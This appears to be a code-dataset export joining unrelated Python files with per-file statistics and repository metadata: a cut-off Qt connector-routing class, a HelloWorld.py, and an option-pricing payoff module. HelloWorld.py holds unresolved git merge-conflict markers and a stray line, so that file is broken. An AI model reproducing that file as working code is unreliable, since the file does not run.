path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + srcWinRect[3] + vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] + srcWinRect[3] + vDistSrc)
else: # Destination is above source
if compHiddenOnLeft:
if srcPoints[2][0] + srcPadding > srcWinRect[0] + srcWinRect[2]:
bottom = srcPoints[3]
right = srcPoints[2]
left = srcPoints[1]
if left[0] > leftPausePoint:
path.moveTo(left[0], left[1])
path.lineTo(leftPausePoint, left[1])
path.lineTo(leftPausePoint, srcWinRect[1] - vDistSrc)
elif right[0] > leftPausePoint:
path.moveTo(leftPausePoint, bottom[1])
path.lineTo(leftPausePoint, srcWinRect[1] - vDistSrc)
elif right[0] + srcPadding > leftPausePoint:
path.moveTo(right[0], right[1])
path.lineTo(leftPausePoint, right[1])
path.lineTo(leftPausePoint, srcWinRect[1] - vDistSrc)
elif right[0] + srcPadding > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] - vDistSrc)
elif right[0] > srcWinRect[0] + srcWinRect[2] + ecEnterDist:
path.moveTo(right[0], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] - vDistSrc)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], right[1])
path.lineTo(right[0] + srcPadding, right[1])
path.lineTo(right[0] + srcPadding, srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
srcWinRect[1] + srcWinRect[3] - ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2], srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + ecEnterDist, srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
elif compHiddenOnRight:
if srcPoints[1][0] < srcWinRect[0] + srcWinRect[2] + srcECSWidth: # Not hidden yet but close
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
elif srcPoints[1][0] - srcPadding < srcWinRect[0] + srcWinRect[2] + srcECSWidth:
left = srcPoints[1]
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] + ecHiddenHeight)
else:
path.moveTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth, srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] + ecHiddenHeight)
path.lineTo(srcWinRect[0] + srcWinRect[2] + srcECSWidth - ecEnterDist,
srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
else:
left = srcPoints[1]
path.moveTo(left[0], left[1])
path.lineTo(left[0] - srcPadding, left[1])
path.lineTo(left[0] - srcPadding, srcWinRect[1] - vDistSrc)
path.lineTo(srcWinRect[0] - hDist, srcWinRect[1] - vDistSrc)
# ---------------------- #
# --- TO DESTINATION --- #
# Basically the same algorithm as leaving src, except all steps are reversed
if not dstInECSection:
# If in left 6th of containing window, enter through left
if dstCompCenter[0] <= dstWinRect[0] + dstWinRect[2] / 6:
direction = 1
left = dstPoints[direction] # x, y coordinate tuple
path.lineTo(srcWinRect[0] - hDist, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
# Else if in top half of window, enter through top, coming from the left
elif dstCompCenter[1] <= dstWinRect[1] + dstWinRect[3] / 2:
direction = 0
top = dstPoints[direction]
path.lineTo(srcWinRect[0] - hDist, dstWinRect[1] - vDistDst)
path.lineTo(top[0], dstWinRect[1] - vDistDst)
path.lineTo(top[0], top[1])
arrival = (top[0], top[1])
# Else in bottom half of window, enter through bottom, coming from the left
elif dstCompCenter[1] > dstWinRect[1] + dstWinRect[3] / 2:
direction = 3
bottom = dstPoints[direction]
path.lineTo(srcWinRect[0] - hDist, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(bottom[0], dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(bottom[0], bottom[1])
arrival = (bottom[0], bottom[1])
else:
raise Exception("Dst: This shouldn't happen.")
# In Extra Components Section
else:
ecEnterDist = echDist # The x distance to pass before turning to go into EC Section
ecHiddenHeight = ecvDist # The height the VB goes to before going to hidden component
leftPausePoint = dstWinRect[0] + dstWinRect[2] + ecEnterDist + 30 - dstPadding # 30 is max pad
compHiddenOnLeft = dstPoints[1][0] - dstPadding < leftPausePoint
compHiddenOnRight = dstPoints[1][0] - dstPadding > dstWinRect[0] + dstWinRect[2] + \
dstECSWidth - ecEnterDist
if srcPoints[0][1] > dstPoints[0][1]: # If destination is above source
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
bottom = dstPoints[3]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, bottom[1])
arrival = (leftPausePoint, bottom[1])
direction = 3
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (
dstWinRect[0] + dstWinRect[2], dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + dstWinRect[3] - ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + dstWinRect[3] + vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
else: # Destination is below source
path.lineTo(srcWinRect[0] - hDist, dstWinRect[1] - vDistDst)
if compHiddenOnLeft:
if dstPoints[2][0] + dstPadding > dstWinRect[0] + dstWinRect[2]:
# For smoother animation. Not hidden yet
top = dstPoints[0]
right = dstPoints[2]
left = dstPoints[1]
if left[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif right[0] > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, top[1])
arrival = (leftPausePoint, top[1])
direction = 0
elif right[0] + dstPadding > leftPausePoint:
path.lineTo(leftPausePoint, dstWinRect[1] - vDistDst)
path.lineTo(leftPausePoint, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] + dstPadding > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(right[0] + dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
elif right[0] > dstWinRect[0] + dstWinRect[2] + ecEnterDist:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(right[0], right[1])
arrival = (right[0], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(right[0] + dstPadding, right[1])
path.lineTo(dstWinRect[0] + dstWinRect[2], right[1])
arrival = (dstWinRect[0] + dstWinRect[2], right[1])
direction = 2
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
path.lineTo(dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2],
dstWinRect[1] + ecHiddenHeight)
direction = 2
elif compHiddenOnRight:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] - vDistDst)
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth - ecEnterDist,
dstWinRect[1] + ecHiddenHeight)
if dstPoints[1][0] < dstWinRect[0] + dstWinRect[2] + dstECSWidth: # Not hidden yet but close
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
elif dstPoints[1][0] - dstPadding < dstWinRect[0] + dstWinRect[2] + dstECSWidth:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] + ecHiddenHeight)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth, left[1])
direction = 1
else:
path.lineTo(dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
arrival = (dstWinRect[0] + dstWinRect[2] + dstECSWidth,
dstWinRect[1] + ecHiddenHeight)
direction = 1
else:
left = dstPoints[1]
path.lineTo(left[0] - dstPadding, dstWinRect[1] - vDistDst)
path.lineTo(left[0] - dstPadding, left[1])
path.lineTo(left[0], left[1])
arrival = (left[0], left[1])
direction = 1
boundingRect = path.boundingRect()
return path, arrival, direction, boundingRect
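# Note: the routing above is built entirely from axis-aligned segments --
# each leg is a moveTo() followed by alternating vertical/horizontal
# lineTo() calls, producing an orthogonal "elbow" route between windows.
# A minimal sketch of that primitive (hypothetical coordinates, Qt assumed):
#     path = QPainterPath()
#     path.moveTo(0, 0)            # leave the source edge
#     path.lineTo(0, 40)           # vertical run to a shared rail
#     path.lineTo(120, 40)         # horizontal run toward the destination
#     path.lineTo(120, 80)         # drop onto the destination edge
#     rect = path.boundingRect()   # reported so Qt can schedule repaints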
def getOneComponentDownRoot(self):
"""
This function is used to locate the base component of the program.
:return: the base component of the program (the component with id = 2, one step below the root component)
:rtype: Component
"""
possibleRoot = self._dataVB.getSrcComponent()
while possibleRoot.getParent().getParent() is not None:
possibleRoot = possibleRoot.getParent()
return possibleRoot
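# Illustrative walk (hypothetical ids): for a tree root(id=1) -> base(id=2)
# -> child(id=5), starting at child the loop climbs parents until the
# grandparent is None, so it returns base(id=2) -- one step below the root.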
def shape(self):
"""
Return the stroked outline of the line, used for hit-testing.
:return: the arrow path, widened by the stroker
:rtype: QPainterPath
"""
path, _, _, _ = self.buildPath()
stroker = QPainterPathStroker()
stroker.setWidth(50)
return stroker.createStroke(path).simplified()
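# Note: createStroke() returns a QPainterPath tracing a 50px-wide band
# around the thin arrow, so nearby clicks still hit-test against shape().
# The same pattern in isolation (a sketch, not tied to this class):
#     stroker = QPainterPathStroker()
#     stroker.setWidth(50)
#     clickable = stroker.createStroke(path).simplified()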
def mousePressEvent(self, event: QGraphicsSceneMouseEvent):
"""
This event handler is implemented to receive mouse press events for this item.
:param event: a mouse press event
:type event: QGraphicsSceneMouseEvent
:return: None
:rtype: NoneType
"""
self._zoomable = False
self.setSelected(True)
self.scene().emitItemSelected(self._dataVB.getId())
def contextMenuEvent(self, event: QGraphicsSceneContextMenuEvent) -> None:
"""
Opens a context menu (right click menu) for the component.
:param event: The event that was generated when the user right-clicked on this item.
:type event: QGraphicsSceneContextMenuEvent
:return: None
:rtype: NoneType
"""
self.menu.exec_(event.screenPos())
| 59.576834
| 137
| 0.475843
| 8,982
| 102,353
| 5.415832
| 0.057226
| 0.088601
| 0.04319
| 0.062411
| 0.817494
| 0.805489
| 0.79445
| 0.786453
| 0.775126
| 0.767026
| 0
| 0.040169
| 0.422821
| 102,353
| 1,717
| 138
| 59.611532
| 0.783262
| 0.095659
| 0
| 0.823356
| 0
| 0
| 0.000893
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008869
| false
| 0
| 0.005174
| 0
| 0.025129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
29ce46f23a59d11d245d9671447b618c2c1183d1
| 151
|
py
|
Python
|
HelloWorld.py
|
mint-pomelo-tea/Hello-World
|
933f45910b148e9dc03dd3038b028724d6951493
|
[
"MIT"
] | null | null | null |
HelloWorld.py
|
mint-pomelo-tea/Hello-World
|
933f45910b148e9dc03dd3038b028724d6951493
|
[
"MIT"
] | null | null | null |
HelloWorld.py
|
mint-pomelo-tea/Hello-World
|
933f45910b148e9dc03dd3038b028724d6951493
|
[
"MIT"
] | null | null | null |
print("Hello World!")
print("Hello World!!")
<<<<<<< HEAD
print("Hello World!!!")
print("Git Branch feature-A")
print("Fix B")
>>>>>>> fix-B
feature-C
| 16.777778
| 29
| 0.609272
| 22
| 151
| 4.181818
| 0.5
| 0.326087
| 0.48913
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10596
| 151
| 8
| 30
| 18.875
| 0.681481
| 0
| 0
| 0
| 0
| 0
| 0.423841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.625
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
29e125cb3b8894e72849e926fc103b90e8c82b52
| 12,544
|
py
|
Python
|
optionpricer/payoff.py
|
pdghawk/optionpricer
|
0086054817b8c1d6dc78faee8e12fd0df99bcae7
|
[
"Apache-2.0"
] | null | null | null |
optionpricer/payoff.py
|
pdghawk/optionpricer
|
0086054817b8c1d6dc78faee8e12fd0df99bcae7
|
[
"Apache-2.0"
] | 2
|
2020-03-24T17:13:54.000Z
|
2020-03-31T03:46:06.000Z
|
optionpricer/payoff.py
|
pdghawk/optionpricer
|
0086054817b8c1d6dc78faee8e12fd0df99bcae7
|
[
"Apache-2.0"
] | null | null | null |
""" Module for payoff classes
series of classes for different payoff types
in C++ would have an abstract base class, and inherited payoff classes
but due to Python's duck typing simply have many payoff classes, all with a
getpayoff method
get_payoff method could instead be __call__ method, but then any abject with __call__
would be able to be used like a payoff, which could cause unexpected errors.
All Payoffs should have (at minimum) the following methods:
get_payoff()
get_strike()
clone()
__str__()
"""
import copy
import numpy as np
#import error
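# Sketch of the duck-typed interface described in the module docstring
# (hypothetical helper; any object exposing get_payoff/get_strike/clone
# works as "a payoff" here):
#     def expiry_value(payoff, spots):
#         return payoff.get_payoff(spots)
#     expiry_value(CallPayOff(100.0), np.array([90.0, 110.0]))  # -> [ 0., 10.]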
class CallPayOff:
""" Payoff for a call option """
def __init__(self,strike):
if not isinstance(strike,(float,int)):
raise TypeError("CallPayOff object initialization: strike should be a float or an integer")
self._strike = strike
self._name = "a call pay off with strike:"+str(self._strike)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
return np.maximum((spot-self._strike), 0.0)
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: the strike of the payoff
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
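# Example (illustrative strike/spots): a call struck at 100 pays max(S - K, 0):
#     c = CallPayOff(100.0)
#     c.get_payoff(np.array([80.0, 100.0, 125.0]))  # -> array([ 0.,  0., 25.])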
class PutPayOff:
""" Payoff for a put option """
def __init__(self,strike):
if not isinstance(strike,(float,int)):
raise TypeError("PutPayOff object initialization: strike should be a float or an integer")
self._strike = strike
self._name = "a put pay off with strike:"+str(self._strike)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
return np.maximum((self._strike-spot), 0.0)
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: the strike of the payoff
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
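# Example (illustrative strike/spots): a put struck at 100 pays max(K - S, 0),
# the mirror image of the call above:
#     p = PutPayOff(100.0)
#     p.get_payoff(np.array([80.0, 100.0, 125.0]))  # -> array([20.,  0.,  0.])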
class DigitalPayOff:
""" Payoff for a digital option """
def __init__(self,strike):
if not isinstance(strike,(float,int)):
raise TypeError("DisigitalPayOff object initialization: strike should be a float or an integer")
self._strike = strike
self._name = "a digital pay off with strike:"+str(self._strike)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, (float, int)):
if spot>self._strike:
return 1.0
else:
return 0.0
elif isinstance(spot, np.ndarray):
payoff = np.zeros_like(spot)
payoff[np.where(spot>self._strike)] = 1.0
return payoff
else:
raise TypeError("spot supplied to DigitalPayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: the strike of the payoff
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
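# Example (illustrative strike/spots): the digital payoff is a 0/1 indicator
# of finishing strictly above the strike; the ndarray branch builds it via
# np.where on a zeros_like array:
#     d = DigitalPayOff(100.0)
#     d.get_payoff(np.array([80.0, 100.0, 125.0]))  # -> array([0., 0., 1.])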
class DoubleDigitalPayOff:
""" Payoff for a double digital option """
def __init__(self,strike_lo,strike_hi):
condition = isinstance(strike_lo,(float,int)) and \
isinstance(strike_hi,(float,int))
if not condition:
raise TypeError("DoubleDigitalPayOff object initialization: strikes should be float or integer")
self._strike_lo = strike_lo
self._strike_hi = strike_hi
self._name = "a double digital pay off with strikes:"+str(self._strike_lo)+", "+str(self._strike_hi)
self._assets = 1 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot to get the payoff for
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, (float, int)):
if spot>self._strike_lo and spot<self._strike_hi:
return 1.0
else:
return 0.0
elif isinstance(spot, np.ndarray):
payoff = np.zeros_like(spot)
payoff[np.where(spot>self._strike_lo)] = 1.0
payoff[np.where(spot>self._strike_hi)] = 0.0
return payoff
else:
raise TypeError("spot supplied to DoubleDigitalPayOff is of unsupported type")
def get_strike(self,lo=True):
""" return the strike of this payoff object
Keyword Args:
- lo: if True, return the lower strike, else return the higher strike
Returns:
- strike: the strike of the payoff according to the selection of
the lo keyword argument
"""
if lo:
return self._strike_lo
else:
return self._strike_hi
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
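# Note on the ndarray branch above: the two masked assignments compose a
# window indicator -- spots above strike_lo are first set to 1.0, then spots
# above strike_hi are reset to 0.0, leaving 1.0 only on (strike_lo, strike_hi].
# Example (illustrative strikes/spots):
#     dd = DoubleDigitalPayOff(90.0, 110.0)
#     dd.get_payoff(np.array([85.0, 100.0, 120.0]))  # -> array([0., 1., 0.])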
# class BadPayOff:
# def __init__(self,strike):
# if not isinstance(strike,(float,int)):
# raise TypeError("CallPayOff object initialization: strike should be a float or an integer")
# self._strike = strike
class ExchangePayOff:
""" Payoff for an exchange option """
def __init__(self):
self._name = "an exchange option"
self._assets = 2 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot(s) to get the payoff for, of size [cases, 2]
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, np.ndarray):
if (spot.ndim==2):
if(np.size(spot,1)==self._assets):
payoff = np.fmax(spot[:,0] - spot[:,1],np.zeros_like(spot[:,0]))
return payoff
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: None, as no strike for exchange object
"""
return None
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
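# Example (illustrative spots): an exchange (Margrabe-style) option pays
# max(S1 - S2, 0) and expects spot shaped [cases, 2]:
#     ex = ExchangePayOff()
#     ex.get_payoff(np.array([[110.0, 100.0], [95.0, 100.0]]))  # -> array([10., 0.])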
class SpreadPayOff:
""" Payoff for a spread option """
def __init__(self,strike):
self._name = "a spread option"
self._strike = strike
self._assets = 2 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot(s) to get the payoff for, of size [cases, 2]
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, np.ndarray):
if (spot.ndim==2):
if(np.size(spot,1)==self._assets):
payoff = np.fmax(spot[:,0] - spot[:,1] - self._strike,np.zeros_like(spot[:,0]))
return payoff
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strike: the strike of the spread payoff
"""
return self._strike
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
class DoubleCallPayOff:
""" Payoff for an exchange option """
def __init__(self,strikes):
self._name = "a double call option"
self.strikes = strikes
self._assets = 2 # number of assets this payoff relates to
def get_payoff(self,spot):
""" returns the payoff for a given spot
Args:
- spot: the spot(s) to get the payoff for, of size [cases, 2]
Returns:
- payoff: The payoff for the given spot
"""
if isinstance(spot, np.ndarray):
if (spot.ndim==2):
if(np.size(spot,1)==self._assets):
payoff = np.fmax(spot[:,0] - self.strikes[0],np.zeros_like(spot[:,0]))
payoff += np.fmax(spot[:,1] - self.strikes[1],np.zeros_like(spot[:,0]))
return payoff
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of wrong size")
else:
raise TypeError("spot supplied to ExchangePayOff is of unsupported type")
def get_strike(self):
""" return the strike of this payoff object
Returns:
- strikes: the pair of strikes for this payoff
"""
return self.strikes
@property
def n_assets(self):
""" return the numnber of assets (underlyings) of this payoff object
Returns:
- number of underlyings
"""
return self._assets
def clone(self):
""" get a clone (deep copy) of this object
Returns:
- a deep copy of this object
"""
return copy.deepcopy(self)
def __str__(self):
return self._name
__repr__ = __str__
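if __name__ == "__main__":
    # Minimal smoke test of the classes above (illustrative strikes and spots,
    # added as a sketch -- not part of the original module's behavior).
    spots = np.array([80.0, 100.0, 125.0])
    for payoff in (CallPayOff(100.0), PutPayOff(100.0), DigitalPayOff(100.0)):
        print(payoff, "->", payoff.get_payoff(spots))
    two_asset_spots = np.array([[110.0, 100.0], [95.0, 100.0]])
    spread = SpreadPayOff(5.0)
    print(spread, "->", spread.get_payoff(two_asset_spots))  # -> [5. 0.]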
| 30.520681
| 110
| 0.577726
| 1,534
| 12,544
| 4.573012
| 0.092568
| 0.047042
| 0.035923
| 0.035923
| 0.80613
| 0.80057
| 0.791447
| 0.782038
| 0.766785
| 0.753956
| 0
| 0.005543
| 0.338409
| 12,544
| 410
| 111
| 30.595122
| 0.83974
| 0.345026
| 0
| 0.741935
| 0
| 0
| 0.144775
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.225806
| false
| 0
| 0.010753
| 0.037634
| 0.526882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
